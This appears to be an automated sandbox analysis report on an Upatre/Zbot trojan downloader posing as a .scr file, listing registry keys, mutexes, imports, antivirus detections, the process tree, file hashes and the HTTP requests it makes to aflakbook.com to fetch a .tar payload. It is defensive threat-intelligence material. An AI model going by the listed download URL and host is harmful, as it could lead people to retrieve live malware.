\CurVer
\ShellEx\IconHandler
\Clsid
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\tmpie.exe
HKEY_CLASSES_ROOT\Applications\tmpie.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1547161642-507921405-839522115-1004
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Wow\CpuEnv
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\WOW\Console
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WOW
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\SYSTEM
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\VirtualDeviceDrivers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server
CTF.TimListCache.FMPDefaultS-1-5-21-1547161642-507921405-839522115-1004MUTEX.DefaultS-1-5-21-1547161642-507921405-839522115-1004
ShimCacheMutex
Groove:PathMutex:[LUt+jL/YbxUWwjk7hRky++rqRco=]
_!MSFTHISTORY!_
c:!documents and settings!user!local settings!temporary internet files!content.ie5!
c:!documents and settings!user!cookies!
c:!documents and settings!user!local settings!history!history.ie5!
WininetStartupMutex
WininetConnectionMutex
WininetProxyRegistryMutex

PE Imphash

f05eb749a5202c19233659e352176ac2

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x0000155a 0x00001600 6.35839963178
.data 0x00003000 0x00000566 0x00000600 1.58325390927
.rsrc 0x00004000 0x00002ad8 0x00002c00 4.69595626052

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x00004150 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_GROUP_ICON 0x000066f8 0x00000014 LANG_ENGLISH SUBLANG_ENGLISH_US MS Windows icon resource - 1 icon
RT_VERSION 0x00006940 0x00000194 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_MANIFEST 0x00006710 0x0000022e LANG_ENGLISH SUBLANG_ENGLISH_US XML document text

Imports

Library USER32.dll:
0x401028 SendMessageA
0x40102c MessageBoxA
0x401030 DefWindowProcA
0x401034 CreateWindowExA
0x401038 BeginPaint
0x40103c GetWindowRect
0x401040 DrawTextA
0x401044 EndPaint
0x401048 GetMessageA
0x40104c ShowWindow
0x401050 UpdateWindow
0x401054 PostMessageA
0x401058 SetCursor
0x40105c SetCapture
0x401060 TrackPopupMenu
0x401064 GetKeyState
0x40106c GetWindowTextA
0x401070 RegisterClassA
0x401074 DispatchMessageA
0x401078 GetDlgItemTextA
Library KERNEL32.dll:
0x401008 GetProcessHeap
0x40100c LoadLibraryA
0x401010 GetModuleHandleA
0x401014 CloseHandle
0x401018 GetStartupInfoA
0x40101c GetVersionExA
0x401020 HeapAlloc
Library COMCTL32.dll:
0x401000 None

!This program cannot be run in DOS mode.
`.data
stebelete
oldtengo
gegeout
static
button
Kernel32.dll
RichEdit
Riched32.dll
Uk9|Yk
!<cHGh
Uk9aD`
~kMhNh
`|(B_@
~k#{+G
Tg!Ixm
Uk9aD`
bO!@Dg
`a.IXw
[`9IYj
w}9{+M
|j!I+M
Wv(O^p
QDX'/}R
ac.CX*
7}h_+!
yl"C@*
wx$_Bk
`g=XX+
WAVAf9
K<F$z*y
GetDlgItemTextA
GetWindowTextA
RegisterClassA
TranslateAcceleratorA
GetKeyState
TrackPopupMenu
SetCapture
SetCursor
PostMessageA
GetWindowRect
SendMessageA
MessageBoxA
DefWindowProcA
CreateWindowExA
BeginPaint
DispatchMessageA
DrawTextA
EndPaint
GetMessageA
ShowWindow
UpdateWindow
USER32.dll
GetVersionExA
GetStartupInfoA
CloseHandle
GetModuleHandleA
LoadLibraryA
GetProcessHeap
HeapAlloc
KERNEL32.dll
COMCTL32.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="1.0.0.0"
processorArchitecture="*"
name="Company.Product.Name"
type="win32"
<description></description>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
</dependentAssembly>
</dependency>
</assembly>
IDR_VERSION1
VS_VERSION_INFO
FileInfo
FFFF06E2
FileVersion
1.0.1.2
ProductVersion
1.0.1.2
CompanyName
ZoCorporation
ProductName
VFileInfo
Translation
Antivirus Signature
Bkav Clean
MicroWorld-eScan Trojan.GenericKD.1652103
nProtect Trojan/W32.Bublik.19456.I
CMC Clean
CAT-QuickHeal TrojanDownloader.Upatre.r3
McAfee Generic.sj
Malwarebytes Trojan.Downloader.UPT
Zillya Clean
AegisLab Clean
K7AntiVirus Trojan-Downloader ( 0040f7f11 )
K7GW Trojan-Downloader ( 0040f7f11 )
TheHacker Clean
NANO-Antivirus Clean
F-Prot W32/Trojan2.ODVY
Symantec Trojan.Zbot
Norman Upatre.CJ
TotalDefense Win32/Upatre.EdVdXFC
TrendMicro-HouseCall TROJ_UPATRE.AAN
Avast Win32:Trojan-gen
ClamAV Clean
Kaspersky Trojan.Win32.Bublik.clmd
BitDefender Trojan.GenericKD.1652103
Agnitum Trojan.DL.Waski!
ViRobot Trojan.Win32.Zbot.19456.B
Ad-Aware Trojan.GenericKD.1652103
Sophos Troj/Zbot-IEA
Comodo Clean
F-Secure Trojan.GenericKD.1652103
DrWeb Trojan.DownLoad3.28161
VIPRE Win32.Malware!Drop
AntiVir TR/Necurs.H.1
TrendMicro TROJ_UPATRE.AAN
McAfee-GW-Edition Generic.sj
Emsisoft Trojan.GenericKD.1652103 (B)
Jiangmin Clean
Antiy-AVL Trojan/Win32.Bublik
Kingsoft Clean
Microsoft TrojanDownloader:Win32/Upatre.V
SUPERAntiSpyware Trojan.Agent/Gen-Necurs
AhnLab-V3 Trojan/Win32.Zbot
GData Trojan.GenericKD.1652103
Commtouch W32/Trojan.AZAS-5859
ByteHero Clean
VBA32 Clean
Baidu-International Trojan.Win32.Waski.A
ESET-NOD32 Win32/TrojanDownloader.Waski.A
Rising Clean
Ikarus Trojan-Spy.Zbot
Fortinet W32/Agent.SQW!tr
AVG Downloader.Generic13.CCCX
Panda Generic Malware
Qihoo-360 HEUR/Malware.QVM20.Gen

  • report_7492740375439754.scr 1088
    • smcos.exe 2004
      • ntvdm.exe 172
report_7492740375439754.scr, PID: 1088, Parent PID: 1824

network filesystem registry process services synchronization

smcos.exe, PID: 2004, Parent PID: 1088

network filesystem registry process services synchronization

ntvdm.exe, PID: 172, Parent PID: 2004

network filesystem registry process services synchronization

Domains

Domain IP
aflakbook.com 176.9.177.26

Hosts

IP
176.9.177.26

HTTP Requests

URI Data
http://aflakbook.com/classes/images/e2304USm.tar
GET /classes/images/e2304USm.tar HTTP/1.1
Accept: text/*, application/*
User-Agent: aaaaaaa bbbbbbbbbb
Host: aflakbook.com
Cache-Control: no-cache

http://aflakbook.com/cgi-sys/suspendedpage.cgi
GET /cgi-sys/suspendedpage.cgi HTTP/1.1
Accept: text/*, application/*
User-Agent: aaaaaaa bbbbbbbbbb
Host: aflakbook.com
Cache-Control: no-cache
Connection: Keep-Alive

IRC Traffic

No IRC traffic.

SMTP Requests

No SMTP requests performed.

File name autoexec.bat
File Size 0 bytes
File Type empty
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
CRC32 00000000
Ssdeep 3::
Yara None matched
File name tmpie.exe
File Size 5861 bytes
File Type HTML document, UTF-8 Unicode text, with CRLF line terminators
MD5 3c4831b6a234d0de88b9c2c9ba3a6b10
SHA1 e9c9d82f0b161949c2c0f258f4a6dc9a49575f69
SHA256 e690af2a93fd15309bb26586296d172c92a38ee8b660233a32661cd73fed184e
CRC32 5A1E5267
Ssdeep 96:kggsVjbhjLlIk6HIVdDzE7Jx41TZkE0+nE1UUE0bEbTvBm3xvBm39Cs7JAv5Eed5:klsVvhHbJzENxwV0IEGUEGEXBKBWNKV/
Yara None matched
File name report_7492740375439754.scr
File Size 19456 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 09cd9eb12effac3a5e9bcb83673d9807
SHA1 baad2cf8a7d25ffa752fccea7575b13009e19a12
SHA256 74f539fae25299555afbc1a090d639fe2eb5db123226cc4b39a27ae1e3a6278d
CRC32 8B8ED7A4
Ssdeep 192:gkNUhM5KAPWgLzfaWB27kOLd0R0XAsqSHrAdpA/4WBP82e1q92G:gkNDkPL40XAsBHrAdQ4WBP82wU2G
Yara None matched
File name scs3.tmp
File Size 2686 bytes
File Type ASCII English text, with CRLF line terminators
MD5 4a587187d760161311010b03417b3c3f
SHA1 863bbf5f7f4114a1307c6bad5dd89224d511fed5
SHA256 b7792de7a6d7abb649a8a22e9048d0468b604ca98b8978bdd1171356af6d5f49
CRC32 7F49CEE2
Ssdeep 48:OxFSPnXOoz6xGGBkIV2SVFI8Ag52hG4VYEz/ss10hdmDpaQcaJ0jpn:im9OGGqcxF3whG8YEz/UmXzJ0jpn
Yara None matched
File name smcos.exe
File Size 19574 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0ad407a168aa1d2545241bb182b02033
SHA1 f30a413c305997d3abf3eb12fd9afa7cabcd2dc7
SHA256 26317724a89bb875b7746d0f42df2c380bb72769a62cb14a7a988bfe77e49b49
CRC32 A16649DA
Ssdeep 192:gkNUhM5KAPWgLzfaWB27kOLd0R0XAsqSHrAdpA/4WBP82e1q92Ga:gkNDkPL40XAsBHrAdQ4WBP82wU2Ga
Yara None matched
File name scs4.tmp
File Size 1670 bytes
File Type DOS batch file, ASCII text, with CRLF line terminators
MD5 71f4b39c5eb73df738ad3e0dacd89057
SHA1 8565ed558ad273232104e0b10cd87cff723a1eca
SHA256 d504b1c272cd0c92c4a365086cf884a4889653c89d5602b6dadeffb33b83951d
CRC32 57C5BF94
Ssdeep 24:FdM2fMOL31HImyqulppIqZYGZ+Dg8pAcM3s+5slwQT3eAbntJPFBfPCZ:wTOIqu5/Z+K7slwQTvntJPPPCZ
Yara None matched
Bummer! No comments yet.

You have to login to comment.